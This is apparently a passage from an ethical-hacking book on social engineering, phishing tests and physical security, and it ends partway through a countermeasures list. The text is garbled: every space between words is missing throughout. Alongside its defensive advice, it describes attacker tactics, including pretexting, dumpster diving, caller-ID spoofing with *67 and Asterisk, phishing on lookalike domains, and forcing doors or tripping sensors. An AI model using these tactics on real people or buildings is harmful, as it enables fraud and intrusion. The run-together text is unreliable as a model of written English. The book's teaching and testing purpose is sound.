Sometimes,socialengineersactasconfidentandknowledgeablemanagersorexecutives.Atothertimestheymightplaytherolesofextremelyuninformedornaïveemployees.Theyalsomightposeasoutsiders,suchasITconsultantsormaintenanceworkers.Socialengineersaregreatatadaptingtotheiraudience.Ittakesaspecialtypeofpersonalitytopullthisoff,oftenresemblingthatofasociopath.
Effectiveinformationsecurity—especiallythesecurityrequiredforfightingsocialengineering—oftenbeginsandendswithyourusers.Otherchaptersinthisbookprovideadviceontechnicalcontrolsthatcanhelpfightsocialengineering,butneverforgetthatbasichumancommunicationsandinteractionhaveaprofoundeffectonthelevelofsecurityinyourorganizationatanygiventime.Thecandy-securityadageis“Hard,crunchyoutside;soft,chewyinside.”Thehard,crunchyoutsideisthelayerofmechanisms—suchasfirewalls,intrusionpreventionsystems,andcontentfiltering—thatorganizationstypicallyrelyontosecuretheirinformation.Thesoft,chewyinsideisthepeopleandtheprocessesinsidetheorganization.Ifthebadguyscangetpastthethickouterlayer,theycancompromisethe(mostly)defenselessinnerlayer.
StartingYourSocialEngineeringTestsIapproachtheethicalhackingmethodologiesinthischapterdifferentlythaninsubsequentchapters.Socialengineeringisanartandascience.Socialengineeringtakesgreatskilltoperformasasecurityprofessionalandishighly-dependentonyourpersonalityandoverallknowledgeoftheorganization.
Ifsocialengineeringisn’tnaturalforyou,considerusingtheinformationinthischapterforeducationalpurposessoyoucanlearntohowtobestdefendagainstit.Don’thesitatetohireathirdpartytoperformthistestingifthatmakesthebestbusinesssensefornow.
Socialengineeringcanharmpeople’sjobsandreputations,andconfidentialinformationcouldbeleaked.Thisisespeciallytruewhenphishingtestsareperformed.Planthingsoutandproceedwithcaution.
Youcanperformsocialengineeringattacksinmillionsofways.Fromwalkingthroughthefrontdoorpurportingtobesomeoneyou’renottolaunchinganall-oute-mailphishingcampaign,theworldisyouroyster.Forthisreason,andbecausetrainingspecificbehaviorsinasinglechapterisnexttoimpossible,Idon’tprovidehow-toinstructionsforcarryingoutsocialengineeringattacks.Instead,Idescribespecificsocialengineeringscenariosthathaveworkedwellformeandothers.Youcantailorthesesametricksandtechniquestoyourspecificsituation.
Anoutsidertotheorganizationmightperformcertainsocialengineeringtechniquessuchasphysicalintrusiontestsbest.Ifyouperformthesetestsagainstyourownorganization,actingasanoutsidermightbedifficultifeveryoneknowsyou.Thisriskofrecognitionmightnotbeaprobleminlargerorganizations,butifyouhaveasmall,close-knitcompany,peoplemightcatchon.
Youcanoutsourcesocialengineeringtestingtoanoutsidefirmorevenhaveatrustedcolleagueperformthetestsforyou.IcoverthetopicofoutsourcingsecurityandethicalhackinginChapter19.
WhyAttackersUseSocialEngineeringPeopleusesocialengineeringtobreakintosystemsandattaininformationbecauseit’softenthesimplestwayforthemtogetwhatthey’relookingfor.They’dmuchratherhavesomeoneopenthedoortotheorganizationthanphysicallybreakinandriskbeingcaught.Securitytechnologiessuchasfirewallsandaccesscontrolswon’tstopadeterminedsocialengineer.
Manysocialengineersperformtheirattacksslowlytoavoidsuspicion.Socialengineersgatherbitsofinformationovertimeandusetheinformationtocreateabroaderpictureoftheorganizationthey’retryingtomanipulate.Thereinliesoneoftheirgreatestassets:time.They’vegotnothingbuttimeandwilltaketheproperamountnecessarytoensuretheirattacksaresuccessfulAlternatively,somesocialengineeringattackscanbeperformedwithaquickphonecallore-mail.Themethodsuseddependontheattacker’sstyleandabilities.Eitherway,you’reatadisadvantage.
Socialengineersknowthatmanyorganizationsdon’thaveformaldataclassificationprograms,accesscontrolsystems,incidentresponseplans,orsecurityawarenessprograms,andtheytakeadvantageoftheseweaknesses.
Socialengineersoftenknowalittleaboutalotofthings—bothinsideandoutsidetheirtargetorganizations—becausethisknowledgehelpsthemintheirefforts.ThankstosocialmediasuchasLinkedIn,Facebook,andotheronlineresourcesIdiscussininChapter5,everytidbitofinformationtheyneedisoftenattheirdisposal.Themoreinformationsocialengineersgainaboutorganizations,theeasieritisforthemtoposeasemployeesorothertrustedinsiders.Socialengineers’knowledgeanddeterminationgivethemtheupperhandovermanagementandtheiremployeeswhodon’trecognizethevalueoftheinformationthatsocialengineersseek.
UnderstandingtheImplicationsManyorganizationshaveenemieswhowanttocausetroublethroughsocialengineering.Thesepeoplemightbecurrentorformeremployeesseekingrevenge,competitorswantingalegup,orhackerstryingtoprovetheirworth.
Regardlessofwhocausesthetrouble,everyorganizationisatrisk—especiallygiventhesprawlingInternetpresenceoftheaveragecompany.Largercompaniesspreadacrossseverallocationsareoftenmorevulnerablegiventheircomplexity,butsmallercompaniescanalsobeattacked.Everyone,fromreceptioniststosecurityguardstoexecutivestoITpersonnel,isapotentialvictimofsocialengineering.Helpdeskandcallcenteremployeesareespeciallyvulnerablebecausetheyaretrainedtobehelpfulandforthcomingwithinformation.
Socialengineeringhasseriousconsequences.Becausetheobjectiveofsocialengineeringistocoercesomeoneforinformationtoleadtoill-gottengains,anythingispossible.Effectivesocialengineerscanobtainthefollowinginformation:
UserpasswordsSecuritybadgesorkeystothebuildingandeventothecomputerroomIntellectualpropertysuchasdesignspecifications,sourcecode,orotherresearchanddevelopmentdocumentationConfidentialfinancialreportsPrivateandconfidentialemployeeinformationPersonally-identifiableinformation(PII)suchashealthrecordsandcardholderinformationCustomerlistsandsalesprospects
Ifanyoftheprecedinginformationisleaked,financiallosses,loweredemployeemorale,decreasedcustomerloyalty,andevenlegalandregulatorycomplianceissuescouldresult.Thepossibilitiesareendless.
Socialengineeringattacksaredifficulttoprotectagainstforvariousreasons.Foronething,theyaren’twelldocumented.Foranother,socialengineersarelimitedonlybytheirimaginations.Also,becausesomanypossiblemethodsexist,recoveryandprotectionaredifficultaftertheattack.Furthermore,thehard,crunchyoutsideoffirewallsandintrusionpreventionsystemsoftencreatesafalsesenseofsecurity,makingtheproblemevenworse.
Withsocialengineering,youneverknowthenextmethodofattack.Thebestthingsyoucandoaretoremainvigilant,understandthesocialengineer’smotivesandmethodologies,andprotectagainstthemostcommonattacksthroughongoingsecurityawarenessinyourorganization.Idiscusshowyoucandothisintherestofthischapter.
BuildingtrustTrust—sohardtogain,yetsoeasytolose.Trustistheessenceofsocialengineering.Mostpeopletrustothersuntilasituationforcesthemnotto.Peoplewanttohelponeanother,especiallyiftrustcanbebuiltandtherequestforhelpseemsreasonable.Mostpeoplewanttobeteamplayersintheworkplaceanddon’trealizewhatcanhappeniftheydivulgetoomuchinformationtoasourcewhoshouldn’tbetrusted.Thistrustallowssocialengineerstoaccomplishtheirgoals.Ofcourse,buildingdeeptrustoftentakestime.Craftysocialengineerscangainitwithinminutesorhours.Howdotheydoit?
Likability:Whocan’trelatetoaniceperson?Everyonelovescourtesy.Thefriendliersocialengineersare—withoutgoingoverboard—thebettertheirchancesofgettingwhattheywant.Socialengineersoftenbegintobuildarelationshipbyestablishingcommoninterests.Theyoftenusetheinformationtheygainintheresearchphasetodeterminewhatthevictimlikesandtopretendthattheylikethosethings,too.Theycanphonevictimsormeettheminpersonand,basedoninformationthesocialengineershavediscoveredabouttheperson,starttalkingaboutlocalsportsteamsorhowwonderfulitistobesingleagain.Afewlow-keyandwell-articulatedcommentscanbethestartofanicenewrelationship.Believability:Believabilityisbasedinpartontheknowledgesocialengineershaveandhowlikabletheyare.Socialengineersalsouseimpersonation—perhapsbyposingasnewemployeesorfellowemployeesthatthevictimhasn’tmet.Theymayevenposeasvendorswhodobusinesswiththeorganization.Theyoftenmodestlyclaimauthoritytoinfluencepeople.Themostcommonsocialengineeringtrickistodosomethingnicesothatthevictimfeelsobligatedtobeniceinreturnortobeateamplayerfortheorganization.
ExploitingtherelationshipAftersocialengineersobtainthetrustoftheirunsuspectingvictims,theycoaxthevictimsintodivulgingmoreinformationthantheyshould.Whammo—thesocialengineercangoinforthekill.Socialengineersdothisthroughface-to-faceorelectroniccommunicationthatvictimsfeelcomfortablewith,ortheyusetechnologytogetvictimstodivulgeinformation.
DeceitthroughwordsandactionsWilysocialengineerscangetinsideinformationfromtheirvictimsinmanyways.Theyareoftenarticulateandfocusonkeepingtheirconversationsmovingwithoutgivingtheirvictimsmuchtimetothinkaboutwhatthey’resaying.However,ifthey’recarelessoroverlyanxiousduringtheirsocialengineeringattacks,thefollowingtip-offsmightgivethemaway:
Actingoverlyfriendlyoreager
MentioningnamesofprominentpeoplewithintheorganizationBraggingaboutauthoritywithintheorganizationThreateningreprimandsifrequestsaren’thonoredActingnervouswhenquestioned(pursingthelipsandfidgeting—especiallythehandsandfeetbecausecontrollingbodypartsthatarefartherfromthefacerequiresmoreconsciouseffort)OveremphasizingdetailsExperiencingphysiologicalchanges,suchasdilatedpupilsorchangesinvoicepitchAppearingrushedRefusingtogiveinformationVolunteeringinformationandansweringunaskedquestionsKnowinginformationthatanoutsidershouldnothaveUsinginsiderspeechorslangasaknownoutsiderAskingstrangequestionsMisspellingwordsinwrittencommunications
Agoodsocialengineerisn’tobviouswiththeprecedingactions,butthesearesomeofthesignsthatmaliciousbehaviorisintheworks.Ofcourse,ifthepersonisasociopathorpsychopath,yourexperiencemayvary.(PsychologyForDummiesbyAdamCashisagoodresourceforsuchcomplexitiesofthehumanmind.)
Socialengineersoftendoafavorforsomeoneandthenturnaroundandaskthatpersonifheorshewouldmindhelpingthem.Thiscommonsocialengineeringtrickworksprettywell.Socialengineersalsooftenusewhat’scalledreversesocialengineering.Thisiswheretheyofferhelpifaspecificproblemarises;sometimepasses,theproblemoccurs(oftenbytheirdoing),andthentheyhelpfixtheproblem—notunlikepoliticiansinWashington,DC!Theymaycomeacrossasheroes,whichcanfurthertheircause.Socialengineersmightaskanunsuspectingemployeeforafavor.Yes—theyjustoutrightaskforafavor.Manypeoplefallforthistrap.
Impersonatinganemployeeiseasy.Socialengineerscanwearasimilar-lookinguniform,makeafakeIDbadge,orsimplydressliketherealemployees.Peoplethink,“Hey—helooksandactslikeme,sohemustbeoneofus.”Socialengineersalsopretendtobeemployeescallingfromanoutsidephoneline.Thistrickisanespeciallypopularwayofexploitinghelpdeskandcallcenterpersonnel.Socialengineersknowthattheseemployeesfallintoaruteasilybecausetheirtasksarerepetitive,suchassaying,“Hello,canIgetyourcustomernumber,please?”
DeceitthroughtechnologyTechnologycanmakethingseasier—andmorefun—forthesocialengineer.Often,a
maliciousrequestforinformationcomesfromacomputerorotherelectronicentitythatthevictimsthinktheycanidentify.Butspoofingacomputername,ane-mailaddress,afaxnumber,oranetworkaddressiseasy.Fortunately,youcantakeafewcountermeasuresagainstthistypeofattack,asdescribedinthenextsection.
Hackerscandeceivethroughtechnologybysendinge-mailthatasksvictimsforcriticalinformation.Suchane-mailusuallyprovidesalinkthatdirectsvictimstoaprofessional-andlegitimate-lookingwebsitethat“updates”suchaccountinformationasuserIDs,passwords,andSocialSecuritynumbers.Theymightalsodothisonsocialnetworkingsites,suchasFacebookandMyspace.
Manyspamandphishingmessagesalsousethistrick.Mostusersareinundatedwithsomuchspamandotherunwantede-mailthattheyoftenlettheirguarddownandopene-mailsandattachmentstheyshouldn’t.Thesee-mailsusuallylookprofessionalandbelievable.Theyoftendupepeopleintodisclosinginformationtheyshouldnevergiveinexchangeforagift.ThesesocialengineeringtricksalsooccurwhenahackerwhohasalreadybrokenintothenetworksendsmessagesorcreatesfakeInternetpop-upwindows.Thesametrickshaveoccurredthroughinstantmessagingandcellphonemessaging.
Insomewell-publicizedincidents,hackerse-mailedtheirvictimsapatchpurportingtocomefromMicrosoftoranotherwell-knownvendor.Usersthinkitlookslikeaduckanditquackslikeaduck—butit’snottherightduck!Themessageisactuallyfromahackerwantingtheusertoinstallthe“patch,”whichinstallsaTrojan-horsekeyloggerorcreatesabackdoorintocomputersandnetworks.Hackersusethesebackdoorstohackintotheorganization’ssystemsorusethevictims’computers(knownaszombies)aslaunchingpadstoattackanothersystem.Evenvirusesandwormscanusesocialengineering.Forinstance,theLoveBugwormtolduserstheyhadasecretadmirer.Whenthevictimsopenedthee-mail,itwastoolate.Theircomputerswereinfected(andperhapsworse,theydidn’thaveasecretadmirer).
TheNigerian419e-mailfraudschemeattemptstoaccessunsuspectingpeople’sbankaccountsandmoney.Thesesocialengineers—Imeanscamsters—offertotransfermillionsofdollarstothevictimtorepatriateadeceasedclient’sfundstotheUnitedStates.Allthevictimmustprovideispersonalbank-accountinformationandalittlemoneyupfronttocoverthetransferexpenses.Victimsthenhavetheirbankaccountsemptied.Thistraphasbeenaroundforawhile,andit’sashamethatpeoplestillfallforit.
ManycomputerizedsocialengineeringtacticscanbeperformedanonymouslythroughInternetproxyservers,anonymizers,remailers,andbasicSMTPserversthathaveanopenrelay.Whenpeoplefallforrequestsforconfidentialpersonalorcorporateinformation,thesourcesofthesesocialengineeringattacksareoftenimpossibletotrack.
PerformingSocialEngineeringAttacksTheprocessofsocialengineeringisactuallyprettybasic.Generally,socialengineersdiscoverthedetailsonpeople,organizationalprocesses,andinformationsystemstoperformtheirattacks.Withthisinformation,theyknowwhattopursue.Socialengineeringattacksaretypicallycarriedoutinfoursimplesteps:
1. Performresearch.2. Buildtrust.3. Exploitrelationshipsforinformationthroughwords,actions,ortechnology.4. Usetheinformationgatheredformaliciouspurposes.
Thesestepscanincludenumeroussubstepsandtechniques,dependingontheattackbeingperformed.
Beforesocialengineersperformtheirattacks,theyneedagoal.Thisisthefirststepintheseattackers’processesforsocialengineering,andthisgoalismostlikelyalreadyimplantedintheirminds.Whatdotheywanttoaccomplish?Whatarethesocialengineerstryingtohack?Why?Dotheywantintellectualproperty,serverpasswords,orisitaccesstheydesire?Or,dotheysimplywanttoprovethatthecompany’sdefensescanbepenetrated?Inyoureffortsasasecurityprofessionalperformingsocialengineering,determinethisoverallgoalbeforeyoubegin.Otherwise,you’lljustbewanderingaimlesslycreatingunnecessaryheadachesandrisksforyouandothersalongtheway.
SeekinginformationAftersocialengineershaveagoalinmind,theytypicallystarttheattackbygatheringpublicinformationabouttheirvictim(s).Manysocialengineersacquireinformationslowlyovertimesotheydon’traisesuspicion.Obviousinformationgatheringisatip-offwhendefendingagainstsocialengineering.Imentionotherwarningsignstobeawareofthroughouttherestofthischapter.
Regardlessoftheinitialresearchmethod,allacriminalmightneedtopenetrateanorganizationisanemployeelist,afewkeyinternalphonenumbers,thelatestnewsfromasocialmediawebsite,oracompanycalendar.Chapter5coversmoredetailsoninformationgathering,butthefollowingareworthcallingout.
UsingtheInternetToday’sbasicresearchmediumistheInternet.AfewminutessearchingonGoogleorothersearchengines,usingsimplekeywords,suchasthecompanynameorspecificemployees’names,oftenproducesalotofinformation.YoucanfindevenmoreinformationinSECfilingsatwww.sec.govandatsuchsitesaswww.hoovers.comandhttp://finance.yahoo.com.Manyorganizations—especiallytheirmanagement—wouldbedismayedtodiscovertheorganizationalinformationthat’savailableonline!
Giventheplethoraofsuchinformation,it’softenenoughtostartasocialengineeringattack.
Criminalscanpayjustafewdollarsforacomprehensiveonlinebackgroundcheckonindividuals,executivesincluded.Thesesearchesturnuppracticallyallpublic—andsometimesprivate—informationaboutapersoninminutes.
DumpsterdivingDumpsterdivingisalittlemorerisky—andit’scertainlymessy.But,it’sahighlyeffectivemethodofobtaininginformation.Thismethodinvolvesliterallyrummagingthroughtrashcansforinformationaboutacompany.
Dumpsterdivingcanturnupeventhemostconfidentialofinformationbecausesomepeopleassumethattheirinformationissafeafteritgoesintothetrash.Mostpeopledon’tthinkaboutthepotentialvalueofthepapertheythrowaway.AndI’mnotjusttalkingabouttherecyclevalue!Thesedocumentsoftencontainawealthofinformationthatcantipoffthesocialengineerwithinformationneededtopenetratetheorganization.Theastutesocialengineerlooksforthefollowinghard-copydocuments:
InternalphonelistsOrganizationalchartsEmployeehandbooks,whichoftencontainsecuritypoliciesNetworkdiagramsPasswordlistsMeetingnotesSpreadsheetsandreportsCustomerrecordsPrintoutsofe-mailsthatcontainconfidentialinformation
Shreddingdocumentsiseffectiveonlyifthepaperiscross-shreddedintotinypiecesofconfetti.Inexpensiveshreddersthatshreddocumentsonlyinlongstripsarebasicallyworthlessagainstadeterminedsocialengineer.Withalittletimeandtape,asavvyhackercanpieceadocumentbacktogetherifthat’swhathe’sdeterminedtodo.
Hackersoftengatherconfidentialpersonalandbusinessinformationfromothersbylisteninginonconversationsheldinrestaurants,coffeeshops,andairports.Peoplewhospeakloudlywhentalkingontheircellphonesarealsoagreatsourceofsensitiveinformationforsocialengineers.(Poeticjustice,perhaps?)Airplanesareagreatplaceforshouldersurfingandgatheringsensitiveinformation.WhileI’moutandaboutinpublicplacesandonairplanes,Ihearand
seeanamazingamountofprivateinformation.Youcanhardlyavoidit!
ThebadguysalsolookinthetrashforUSBdrives,DVDs,andothermedia.SeeChapter7formoreontrashandotherphysicalsecurityissues,includingcountermeasuresforprotectingagainstdumpsterdivers.
PhonesystemsAttackerscanobtaininformationbyusingthedial-by-namefeaturebuiltintomostvoicemailsystems.Toaccessthisfeature,youusuallyjustpress0or#aftercallingthecompany’smainnumberorafteryouentersomeone’svoicemailbox.Thistrickworksbestafterhourstoensurenooneanswers.
Socialengineerscanfindinterestingbitsofinformation,attimes,suchaswhentheirvictimsareoutoftown,justbylisteningtovoicemailmessages.Theycanevenstudyvictims’voicesbylisteningtotheirvoicemailmessages,podcasts,orwebcastssotheycanlearntoimpersonatethosepeople.
Attackerscanprotecttheiridentitiesiftheycanhidewheretheycallfrom.Herearesomewaystheycanhidetheirlocations:
ResidentialphonessometimescanhidetheirnumbersfromcallerIDbydialing*67beforethephonenumber.
Thisfeatureisn’teffectivewhencallingtoll-freenumbers(800,888,877,866)or911.DisposablecellphonesandVoIPservicesworkquitewell,however.
Businessphonesinanofficeusingaphoneswitcharemoredifficulttospoof.However,alltheattackerusuallyneedsistheuserguideandadministratorpasswordforthephoneswitchsoftware.Inmanyswitches,theattackercanenterthesourcenumber—includingafalsifiednumber,suchasthevictim’shomephonenumber.VoIPServerssuchastheopensourceAsterisk(www.asterisk.org)canbeusedandconfiguredtosendanynumbertheywant.
Phishinge-mailsThelatest,andoftenmostsuccessful,meansforhackingiscarriedoutviae-mailphishingwherecriminalssendingboguse-mailstopotentialvictimsinanattempttogetthemtodivulgesensitiveinformationorclickmaliciouslinksthatleadtomalwareinfections.Phishinghasactuallybeenaroundforyears,butithasrecentlygainedgreatervisibilitygivensomehigh-profileexploitsagainstseeminglyimpenetrablebusinessesandfederalgovernmentagencies.Phishing’seffectivenessisamazing,andtheconsequencesareoftenugly.I’mseeingsuccessrates(orfailurerates,dependingonhowyoulookatit)ashighas60–70percentinmyownphishingtesting.Awell-wordede-mailisallittakestogleanpasswords,accesssensitiveinformation,orinjectmalwareintotargetedcomputers.
Youcanperformyourownphishingexercises.Arudimentary,yethighly-effective,methodistosetupane-mailaccountonyourdomain,orideally,adomainthatlookssimilartoyoursataglance,requestinformationorlinktoawebsitethatcollectsinformation,sende-mailstoemployeesorotherusersyouwanttotest,andseewhattheydo.Dotheyopenthee-mail,clickthelink,divulgeinformation,or—ifyou’relucky—noneoftheabove?It’sreallyassimpleasthat.
Beittoday’srushedworldofbusiness,generalusergullibility,ordownrightignorance,it’samazinghowsusceptibletheaveragepersonistophishinge-mailexploits.Agoodphishinge-mailthathasagreaterchanceofbeingopenedandrespondedtocreatesasenseofurgencyandprovidesinformationthatpresumablyonlyaninsiderwouldknow.Beyondthat,manyphishinge-mailsareeasytospotbecausetheyoften:
HavetypographicalerrorsContaingenericsalutationsande-mailsignaturesAsktheusertodirectlyclickonalinkSolicitsensitiveinformation
Amoreformalmeansforexecutingyourphishingtestsistouseatoolmadespecificallyforthejob.TherearecommercialoptionsavailableontheInternetsuchasLUCY(http://phishing-server.com)aswellasfreebiessuchasSimplePhishingToolkit(https://github.com/sptoolkit/sptoolkit)whichisnolongersupportedbutcanstillbeusedforthistypeoftesting.Withbothoptions,haveaccesstopre-installede-mailtemplates,theabilitytoscrape(copypagesfrom)livewebsitessoyoucancustomizeyourowncampaign,andvariousreportingcapabilitiessoyoucantrackwhiche-mailusersaretakingthebaitandfailingyourtests.
SocialEngineeringCountermeasuresYouhaveonlyafewgoodlinesofdefenseagainstsocialengineering.Socialengineeringwillputyourlayereddefensestothetruetest.Evenwithstrongsecuritycontrols,anaïveoruntrainedusercanletthesocialengineerintothenetwork.Neverunderestimatethepowerofsocialengineers—andthatofyourusersandhelpingthemgettheirway.
PoliciesSpecificpolicieshelpwardoffsocialengineeringinthelongterminthefollowingareas:
Classifyinginformationsothatusersdon’thaveaccesstocertainlevelsofinformationtheydon’tneedSettingupuserIDswhenhiringemployeesorcontractorsEstablishingacceptablecomputerusagethatemployeesagreetoinwritingRemovinguserIDsforemployees,contractors,andconsultantswhonolongerworkfortheorganizationSettingandresettingstrongpassphrasesRespondingquicklytosecurityincidents,suchassuspiciousbehaviorandknownmalwareinfectionsProperlyhandlingproprietaryandconfidentialinformationEscortingguestsaroundyourbuilding(s)
Thesepoliciesmustbeenforceableandenforcedforeveryonewithintheorganization.Keepthemup-to-date,tellyourusersaboutthem,and,mostimportant,testthem.
UserawarenessandtrainingOneofthebestlinesofdefenseagainstsocialengineeringistrainingemployeestoidentifyandrespondtosocialengineeringattacks.Userawarenessbeginswithinitialtrainingforeveryoneandfollowswithsecurityawarenessinitiativestokeepsocialengineeringdefensesfreshineveryone’smind.Aligntrainingandawarenesswithspecificsecuritypolicies—youmayalsowanttohaveadedicatedsecuritytrainingandawarenesspolicy.
Consideroutsourcingsecuritytrainingtoaseasonedsecuritytrainer.Employeesoftentaketrainingmoreseriouslyifitcomesfromanoutsider.Similartohowafamilymemberorspousewillignorewhatyouhavetosaybuttakethesamewordstoheartifsomeoneelsesaysit.Outsourcingsecuritytrainingisworth
theinvestmentforthatreasonalone.
Whileyouapproachongoingusertrainingandawarenessinyourorganization,thefollowingtipscanhelpyoucombatsocialengineeringinthelongterm:
Treatsecurityawarenessandtrainingasabusinessinvestment.Trainusersonanongoingbasistokeepsecurityfreshintheirminds.Includeinformationprivacyandsecuritytasksandresponsibilitiesineveryone’sjobdescriptions.Tailoryourcontenttoyouraudiencewheneverpossible.Createasocialengineeringawarenessprogramforyourbusinessfunctionsanduserroles.Keepyourmessagesasnontechnicalaspossible.Developincentiveprogramsforpreventingandreportingincidents.Leadbyexample.
Sharethefollowingtipswithyouruserstohelppreventsocialengineeringattacks:
Neverdivulgeanyinformationunlessyoucanvalidatethatthepeoplerequestingtheinformationneeditandarewhotheysaytheyare.Ifarequestismadeoverthetelephone,verifythecaller’sidentityandcallback.Neverclickane-maillinkthatsupposedlyloadsapagewithinformationthatneedsupdating.Thisisespeciallytrueforunsolicitede-mailsandcanbeespeciallytrickyonmobiledeviceswhereusersdon’thavethebenefitofseeingwherethelinktakesyouinmanycases.EncourageyouruserstovalidateshortenedURLsfrombit.ly,ow.ly,etc.,ifthey’reunsureabouttheirsafetyorlegitimacy.Variouswebsitessuchaswww.checkshorturl.comandhttp://wheredoesthislinkgo.comofferthisservice.Becarefulwhensharingpersonalinformationonsocialnetworkingsites,suchasFacebookorLinkedIn.Also,beonthelookoutforpeopleclaimingtoknowyouorwantingtobeyourfriend.Theirintentionsmightbemalicious.Escortallguestswithinthebuilding.Neveropene-mailattachmentsorotherfilesfromstrangers.Nevergiveoutpasswordsorothersensitiveinformation.
Afewothergeneralsuggestionscanwardoffsocialengineering:
Neverletastrangerconnecttooneofyournetworkjacksorinternalwirelessnetworks—evenforafewseconds.Someonewithill-intentcanplaceanetworkanalyzer,installmalware,orotherwisesetupabackdoorthatcanberemotely
accessedwhentheyleave.Classifyyourinformationassets,bothhardcopyandelectronic.Trainallemployeeshowtohandleeachassettype.Developandenforcecomputermediaanddocumentdestructionpoliciesthathelpensuredataishandledcarefullyandstayswhereitshouldbe.Agoodresourceforinformationondestructionpoliciesiswww.pdaconsulting.com/datadp.htm.Usecross-shreddingpapershredders.Betterstill,hireadocument-shreddingcompanythatspecializesinconfidentialdocumentdestruction.
Thefollowingtechniquescanreinforcethecontentofformaltraining:
Newemployeeorientation,traininglunches,e-mails,andnewslettersSocialengineeringsurvivalbrochurewithtipsandFAQsTrinkets,suchasscreensavers,mousepads,stickynotes,pens,andofficepostersthatbearmessagesthatreinforcesecurityprinciples
TheAppendixlistsmyfavoritesecurityawarenesstrinketsandtoolvendorstoimprovesecurityawarenessandeducationinyourorganization.
PhysicalSecurityInThisChapter
Understandingtheimportanceofphysicalsecurity
Lookingforphysicalsecurityvulnerabilities
Implementingcountermeasuresforphysicalsecurityattacks
Istronglybelievethatinformationsecurityismoredependentonnontechnicalpoliciesandbusinessprocessesthanonthetechnicalhardwareandsoftwaresolutionsthatmanypeopleandvendorsswearby.Physicalsecurity,whichistheprotectionofphysicalproperty,encompassesbothtechnicalandnontechnicalcomponents,bothofwhichmustbeaddressed.
Physicalsecurityisanoften-overlookedbutcriticalaspectofaninformationsecurityprogram.Yourabilitytosecureyourinformationdependsonyourabilitytophysicalsecureyouroffice,building,orcampus.Inthischapter,Icoversomecommonphysicalsecurityweaknessesastheyrelatetocomputersandinformationsecuritythatyoumustseekoutandresolve.Ialsooutlinefreeandlow-costcountermeasuresyoucanimplementtominimizeyourbusiness’sphysicalvulnerabilities.
Idon’trecommendbreakingandentering,whichwouldbenecessarytotestcertainphysicalsecurityvulnerabilitiesfully.Instead,approachthoseareastoseehowfaryoucanget.Takeafreshlook—fromanoutsider’sperspective—atthephysicalvulnerabilitiescoveredinthischapter.Youmightdiscoverholesinyourphysicalsecurityinfrastructurethatyouhadpreviouslyoverlooked.
IdentifyingBasicPhysicalSecurityVulnerabilities
Whateveryourcomputer-andnetwork-securitytechnology,practicallyanyhackispossibleifanattackerisinyourbuildingordatacenter.That’swhylookingforphysicalsecurityvulnerabilitiesandfixingthembeforethey’reexploitedissoimportant.
Insmallcompanies,somephysicalsecurityissuesmightnotbeaproblem.Manyphysicalsecurityvulnerabilitiesdependonsuchfactorsas:
SizeofthebuildingNumberofbuildingsorofficelocationsNumberofemployeesLocationandnumberofbuildingentranceandexitpointsPlacementofserverrooms,wiringclosets,anddatacenters
Literallythousandsofpossiblephysicalsecurityweaknessesexist.Thebadguysarealwaysonthelookoutforthem—soyoushouldlookfortheseissuesfirst.HerearesomeexamplesofphysicalsecurityvulnerabilitiesI’vefoundwhenperformingsecurityassessmentsformyclients:
Noreceptionistinabuildingtomonitorwho’scomingandgoingNovisitorsign-inorescortrequiredforbuildingaccessEmployeesoverlytrustingofvisitorsbecausetheywearvendoruniformsorsaythey’reinthebuildingtoworkonthecopierorcomputersNoaccesscontrolsondoorsortheuseoftraditionalkeysthatcanbeduplicatedwithnoaccountabilityDoorsproppedopenIP-basedvideo,accesscontrol,anddatacentermanagementsystemsaccessibleviathenetworkwithvendordefaultuserIDsandpasswordsPubliclyaccessiblecomputerroomsUnsecuredbackupmediasuchastapes,harddrives,andCDs/DVDsSensitiveinformationstoredinhard-copyformatlyingaroundcubiclesratherthanbeingstoredinlockingfilingcabinetsUnsecuredcomputerhardware,especiallyrouters,switches,andunencryptedlaptopsSensitiveinformationbeingthrownawayintrashcansratherthanbeingshreddedorplacedinashredcontainer
Whenthesephysicalsecurityvulnerabilitiesareuncovered,badthingscanhappen.Allittakestoexploittheseweaknessesisanunauthorizedindividualenteringyourbuilding.
PinpointingPhysicalVulnerabilitiesinYourOffice
Manypotentialphysicalsecurityexploitsseemunlikely,buttheycanoccurtoorganizationsthatdon’tpayattentiontophysicalsecurityrisks.Thebadguyscanexploitmanysuchvulnerabilities,includingweaknessesinabuilding’sinfrastructure,officelayout,computer-roomaccess,anddesign.Inadditiontothesefactors,considerthefacility’sproximitytolocalemergencyassistance(police,fire,andambulance)andthearea’scrimestatistics(burglary,breakingandentering,andsoon)soyoucanbetterunderstandwhatyou’reupagainst.
Lookforthevulnerabilitiesdiscussedinthefollowingsectionswhenassessingyourorganization’sphysicalsecurity.Thiswon’ttakealotoftechnicalsavvyorexpensiveequipment.Dependingonthesizeofyourofficeorfacilities,thesetestsshouldn’ttakemuchtimeeither.Thebottomlineistodeterminewhetherthephysicalsecuritycontrolsareadequategivenwhat’satstake.Aboveall,bepracticalandusecommonsense.
BuildinginfrastructureDoors,windows,andwallsarecriticalcomponentsofabuilding—especiallyforadatacenteroranareawhereconfidentialinformationisstored.
AttackpointsCriminalscanexploitahandfulofbuildinginfrastructurevulnerabilities.Considerthefollowingcommonlyoverlookedattackpoints:
Aredoorsproppedopen?Ifso,why?Cangapsatthebottomofcriticaldoorsallowsomeoneusingaballoonorotherdevicetotripasensorontheinsideofanotherwise“secure”room?Woulditbeeasytoforcedoorsopen?Asimplekicknearthedoorknobisusuallyenoughforstandarddoors.Whatisthebuildingordatacentermadeof(steel,wood,concrete),andhowsturdyarethewallsandentryways?Howresilientisthematerialtoearthquakes,tornadoes,strongwinds,heavyrains,andvehiclesdrivingintothebuilding?Wouldthesedisastersleavethebuildingexposedsothatlootersandotherswithmaliciousintentcouldgainaccesstothecomputerroomorothercriticalareas?Areanydoorsorwindowsmadeofglass?Isthisglassclear?Istheglassshatterprooforbulletproof?Dodoorhingesontheoutsidemakeiteasyforintruderstounhookthem?Aredoors,windows,andotherentrypointswiredtoanalarmsystem?Aretheredropceilingswithtilesthatcanbepushedup?Arethewallsslab-to-slab?
Ifnot,someonecouldeasilyscalewalls,bypassinganydoororwindowaccesscontrols.
CountermeasuresManyphysicalsecuritycountermeasuresforbuildingvulnerabilitiesmightrequireothermaintenance,construction,oroperationsexperts.Ifbuildinginfrastructureisnotyourforte,youcanhireoutsideexpertsduringthedesign,assessment,andretrofittingstagestoensurethatyouhaveadequatecontrols.Herearesomeofthebestwaystosolidifybuildingsecurity:
